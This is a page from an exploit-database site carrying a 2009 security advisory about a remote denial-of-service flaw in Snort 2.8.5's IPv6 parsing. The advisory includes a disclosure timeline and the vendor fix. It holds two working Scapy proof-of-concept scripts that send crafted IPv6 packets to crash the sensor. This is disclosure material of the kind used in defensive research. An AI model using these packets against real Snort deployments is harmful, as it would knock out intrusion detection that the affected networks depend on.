0day.today - Biggest Exploit Database in the World.

Select your language:

Things you should know about 0day.today:

We use one main domain: http://0day.today
Most of the materials is completely FREE
If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn GOLD

We accept currencies: [contact admin to find more]

We don't want you to use our site as a tool for hacking purposes, so any kind of action that could affect illegaly other users or websites that you don't have right to access will be banned and your account including your data will be destroyed.

Administration of this site uses the official contacts. Beware of impostors!

We DO NOT use Telegram or any messengers / social networks!
Please, beware of scammers!

I am registered user of 0day.today. I don't want to see this screen in future.

What to do first?

Read the [ agreement ]
Read the [ Submit ] rules
Visit the [ faq ] page
[ Register ] profile
Get [ GOLD ]
If you want to [ sell ]
If you want to [ buy ]
If you lost [ Account ]
Any questions [ admin@0day.today ]

Main links

You can contact us by

Mail:

mr.inj3ct0r@gmail.com

Facebook:

Inj3ct0rs

Twitter:

Inj3ct0r

Telegram:

We DO NOT use Telegram or any messengers / social networks!

[ authorization ] [ registration ] [ restore account ]

You can contact us by:

Mail:

mr.inj3ct0r@gmail.com

Facebook:

Inj3ct0rs

Twitter:

Inj3ct0r

Telegram:

We DO NOT use Telegram or any messengers / social networks!

Snort <= 2.8.5 IPv6 DoS

Author

Laurent Gaffie

Risk

[

Security Risk Unsored

]

0day-ID

0day-ID-9757

Category

dos / poc

Date add

23-10-2009

Platform

unsorted

=======================
Snort <= 2.8.5 IPv6 DoS
=======================

# Title: Snort <= 2.8.5 IPv6 DoS
# CVE-ID: ()
# OSVDB-ID: ()
# Author: laurent gaffie
# Published: 2009-10-23
# Verified: yes

view source
print?
=============================================
- Date: October 22th, 2009
- Discovered by: Laurent Gaffi&#65533;
- Severity: Low
=============================================
 
I. VULNERABILITY
-------------------------
Snort <= 2.8.5 IPV6 Remote DoS
 
 
II. DESCRIPTION
-------------------------
A remote DoS was present in Snort 2.8.5 when parsing some specialy IPv6
crafted packet
To trigger theses bugs you need to have compiled snort with the
--enable-ipv6 option, and run it in verbose mode (-v)
 
III. PROOF OF CONCEPT
-------------------------
You can reproduce theses two differents bugs easily by using the Python
low-level networking lib Scapy
(http://www.secdev.org/projects/scapy/files/scapy-latest.zip)
 
1) #only works on x86
 
#/usr/bin/env python
from scapy.all import *
u = "\x92"+"\x02" * 6
send(IPv6(dst="IPv6_addr_here", nh=6)/u) #nh6 -> TCP
 
2) # works x86,x64
 
#/usr/bin/env python
from scapy.all import *
 
z = "Q" * 30
send(IPv6(dst="IPv6_ADDR_HERE",nh=1)/ICMPv6NIQueryNOOP(type=4)/z) #nh1 ->
icmp (not v6)
 
 
IV. SYSTEMS AFFECTED
-------------------------
Theses proof of concept as been tested on snort:
- 2.8.5
 
V. NOT AFFECTED
-------------------------
Sourcefire 3D Sensor
 
 
VI. SOLUTION
-------------------------
A new version correcting theses issues as been released (2.8.5.1) :
 
http://www.snort.org/downloads
 
 
VII. REFERENCES
-------------------------
http://www.snort.org/
http://vrt-sourcefire.blogspot.com/
 
VIII. REVISION HISTORY
-------------------------
October 14th, 2009: First issue discovered, advisory send to snort team.
October 14th, 2009: Snort security team confirm the bug.
October 16th, 2009: Second issue discovered, advisory send to snort team.
October 20th, 2009: Snort security team confirm the bug.
October 22th, 2009: Snort team released a new version.



#  0day.today [2024-11-16]  #

We DO NOT use Telegram or any messengers / social networks!

Please, beware of scammers!

Snort <= 2.8.5 IPv6 DoS

Report Error

Report Error